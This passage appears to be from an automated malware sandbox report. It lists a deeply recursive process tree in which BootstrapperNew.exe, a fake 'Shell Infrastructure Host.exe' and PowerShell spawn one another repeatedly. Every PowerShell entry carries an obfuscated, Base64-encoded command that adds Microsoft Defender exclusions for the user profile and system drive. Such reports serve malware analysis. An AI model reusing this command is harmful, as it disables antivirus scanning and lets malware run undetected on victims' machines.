        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        116⤵
        
        PID:2012
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        116⤵
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        116⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        117⤵
        
        PID:6884
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        117⤵
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        117⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        118⤵
        
        PID:228
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        118⤵
        
        PID:6712
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        118⤵
        
        PID:7240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        119⤵
        
        PID:4924
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        119⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        119⤵
        
        PID:7216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        120⤵
        
        PID:2936
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        120⤵
        
        PID:7176
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        120⤵
        
        PID:7276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        121⤵
        
        PID:7812
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        121⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        121⤵
        
        PID:7528
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        122⤵
        
        PID:6100
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        122⤵
        
        PID:6896
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        122⤵
        
        PID:6772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        123⤵
        
        PID:5504
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        123⤵
        
        PID:1832
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        123⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        124⤵
        
        PID:6780
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        124⤵
        
        PID:7392
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        124⤵
        
        PID:6512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        125⤵
        
        PID:2596
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        125⤵
        
        PID:7768
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        125⤵
        
        PID:4192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        126⤵
        
        PID:7820
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        126⤵
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        126⤵
        
        PID:6180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        127⤵
        
        PID:3496
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        127⤵
        
        PID:6348
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        127⤵
        
        PID:312
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        128⤵
        
        PID:7980
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        128⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        128⤵
        
        PID:1460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        129⤵
        
        PID:7076
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        129⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        129⤵
        
        PID:7496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        130⤵
        
        PID:1936
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        130⤵
        
        PID:7368
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        130⤵
        
        PID:7632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        131⤵
        
        PID:400
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        131⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        131⤵
        
        PID:6316
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        132⤵
        
        PID:2328
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        132⤵
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        132⤵
        
        PID:1444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        133⤵
        
        PID:1828
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        133⤵
        
        PID:7492
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        133⤵
        
        PID:1976
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        134⤵
        
        PID:6312
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        134⤵
        
        PID:8048
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        134⤵
        
        PID:6584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        135⤵
        
        PID:7640
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        135⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        135⤵
        
        PID:3900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        136⤵
        
        PID:6608
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        136⤵
        
        PID:3504
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        136⤵
        
        PID:7600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        137⤵
        
        PID:5956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        138⤵
        
        PID:1488
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        137⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        137⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        138⤵
        
        PID:3088
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        138⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        138⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        139⤵
        
        PID:1760
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        139⤵
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        139⤵
        
        PID:5384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        140⤵
        
        PID:3416
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        140⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        140⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        141⤵
        
        PID:1236
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        141⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        141⤵
        
        PID:8048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        142⤵
        
        PID:1008
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        142⤵
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        142⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        143⤵
        
        PID:5316
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        143⤵
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        143⤵
        
        PID:6964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
